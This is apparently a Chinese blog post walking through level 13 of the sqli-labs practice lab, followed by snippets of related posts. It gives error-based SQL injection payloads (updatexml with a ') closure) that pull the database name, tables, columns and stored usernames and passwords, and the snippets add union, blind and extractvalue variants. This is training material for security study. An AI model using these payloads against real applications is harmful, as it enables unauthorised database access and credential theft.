sqli-labs靶场Less-13

最新推荐文章于 2021-09-23 17:45:31 发布
最新推荐文章于 2021-09-23 17:45:31 发布
阅读量130 收藏
点赞数
分类专栏: 渗透测试 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/songling515010475/article/details/119914258
版权

1、访问首页,/Less-13/index.php,这里的传参点是表单中的uname、passwd

 探测六步

  1. 判断是否是数字形传参
  2. 判断是否有单引号闭合
  3. 判断是否是双引号闭合
  4. 判断是否单引号+括号闭合
  5. 判断是否是双引号+括号闭合

        如果以上都不适:哪以上规则都同时加上sleep测试一遍,看是不是存在延时注入

分析:这里是单引号+括号闭合,但这里正确时并没有显示点,但在探测过程中会报SQL语名错误的内容,所以这里判断可以用报错注入。

2、尝试使用报错注入

admin') and updatexml(1,concat(0x7e,(select database())),1)-- qwe

分析:通过报错注入得到了数据库的库名。

 3、获取数据库的表名

admin') and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 3,1)),1)-- qwe

 4、获取数据库字段名

') and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 2,1)),1)-- qwe

 5、获取数据库数据

 ') and updatexml(1,concat(0x7e,(select concat(username,0x7e,password) from users limit 2,1)),1)-- qwe

songling515010475
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQLi LABS Less-13 报错注入+布尔盲注
wangyuxiang946的博客
06-21 1万+
SQLi 第十三关,SQLi-LABS Less-13,SQLi-LABS Less 13,SQLiLABS Less13,SQLi Less 13
sqli-labs/Less-13
m0_71299382的博客
11-18 257
sqli-labs第十三关
sqli-labs (less-13)
kukudeshuo的博客
03-09 865
sqli-labs (less-13) 进入13,输入用户名和密码登入,利用hackbar抓取POST请求,但是这里我们发现屏幕上这次没有数据回显了,这也说明我们这里不能再使用union注入了 输入 uname=admin'&passwd=admin&submit=Submit #页面回显错误信息 通过报错信息我们知道闭合方式为’),并且为字符型注入 因为这里没有数据回显,但是我们观察到有完整的错误信息,所以这里可以使用Boolean盲注报错注入攻击 Boolean盲注 查看当前数据库
[SQLi-LABS] Less-13
Stan冲冲冲
05-12 141
可以用盲注和双注 ')or 1=1# ')union select count(*),concat((select database()),floor(rand()*2)) as a from information_schema.columns group by 2# //爆库 ')union select count(*),concat((select group_concat(table_name) from information_schema.tables where table_sche
sqli-labs:Less 11~20 通关详解
qq_45756971的博客
10-27 537
第十一关: 看到登录框,先使用弱口令进行尝试,登录成功 输入单引号尝试引起报错 猜测后台语句为: select * from where username=‘username’ and password=’$password’ 接下来使用布尔注入,这里使用or 1=1永真句可以将所有查找结果输出 判断列数 成功查找到信息 第十二关 输入单引号没有引起报错,尝试输入双引号,报错信息很多,直接看到了后台的语句 这里根据报错信息,使用双引号加括号闭合 第十三关 通过报错信息可以构造如下的闭合方式 这一关同
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
phpstudy+靶场sqli-labs-master下载
11-08
phpstudy+靶场sqli-labs-master下载
sqli-labs靶场练习笔记
最新发布
11-09
sqli-labs靶场练习笔记,里面有2关 3关 4关 5关 4关 7关 8关 9关 11关 12关 13关 14关 15关 16关 17关 18关 19关 20关 21关 22关 23关 24关 的练习内容,可以供给初学sql注入的学者参考
sqli-labs靶场
02-12
sqli-labs靶场
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
sqli-labs(less-13)
筱阳的博客
06-08 904
less-12 可知  通过报错可知  是通过') 闭合的发现没有登入成功返回信息 ...看来是要盲注了...操作就像GET注入一样  只需要改union select 1,2 的信息即可盲注只能考虑sqlmap了......
sqli-labs:less-13
羽的博客
07-24 167
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; cha...
sqli-labs-less-13、14、15、16
giun的博客
02-10 962
Less-13 输入username:admin’,密码随意 故 我们输入username:admin’)#,密码随意 只返回登录状态没有登录信息 所有我们可以使用盲注,这边使用布尔类型的盲注 猜数据库第一位 输入username:admin') and left (database(),1)&amp;gt;'a'# 密码随意 然后 用二分法一个个进行尝试就可以猜出数据库了,其他过程查看less-...
Sqli-labs less 13
weixin_34248118的博客
08-11 95
Less-13 本关我们输入username:admin' Password: (随便输) 进行测试 可以看到报错了,错误为: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use ...
sqli-labs靶场练习Less-11~20(持续更新)--ch4nge
ch4nge
10-26 587
Less11-19 作者:ch4nge 目录Less11-19Less11·post·U手注sqlmapLess12·post·ULess13·post·E手注sqlmapLess 14·post·ELess15·post·BLess16·post·BLess 17·post·ELess 18·UA·E解法1解法2sqlmapLess19·referer·E Less11·post·U 手注 这道题给出来了一个登录框 源码: @$sql="SELECT username, password FROM us
sqli-labs(13)
jimggg的博客
03-20 224
Less-13 POST - Double Injection - Single quotes- String -twist (POST单引号变形双注入) 通过报错可知 是通过’) 闭合的 发现没有登入成功返回信息 ,看来是要盲注了。 方法一,报错型 既然它返回错误信息了,说明有回显,可以报错注入。 样例payload uname=admin') and extractvalue(1,conc...
Sqlilabs解题思路Less10-20
Mr.Huang_的博客
09-23 1489
目录Less-11 POST - Error Based - Single quotes- String (基于错误的POST型单引号字符型注入)1.判断是否存在sql注入漏洞。数据能发现交互,说明存在注入2.判断网页存在字段数。3.判断回显点。4.获取信息。Less-12 POST - Error Based - Double quotes- String-with twist (基于错误的双引号POST型字符型变形的注入)Less-13 POST - Double Injection - Single
sqli-labs less13
qq_45106794的博客
10-18 351
#sqli-labs less13 由于less12 和less 11 差不多,只是单引号变成 ") 所以我们直接来解决less 13 对待less13 我们按老规矩判断其是数值型还是字符型 。。。。。。 然后我们发现他是’) 所以我们继续往下走 admin ’ order by n # 发现n=1 n=2 虽然没有想象中的回显,但是当n=3时,可以发现 所以可以判断字段数为2 接下来试试adm...
sqli-labs buuctf平台+本地环境 全关全解 不是很详解(<_<)
weixin_48083470的博客
07-12 1815
sqli-labs 在buuctf平台 搜索sqli-labs 可以更加模拟线上赛的环境 less-1 less-5 ?id=0' and(select extractvalue(1,concat('~',(select database())))) %23 报错注入详细讲解:https://blog.csdn.net/silence1_/article/details/90812612 less-6 发现不报错了,用布尔盲注 写python代码来跑出内容 import requests url
sqli-labs靶场搭建
09-02
要搭建sqli-labs靶场,你可以按照以下步骤进行操作: 1. 首先,你需要下载sqli-labs的压缩包并解压缩。你可以在引用中提到的sqli-labs-master中找到这个压缩包。 2. 打开sqli-labs-master文件夹,在里面找到sqli-...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值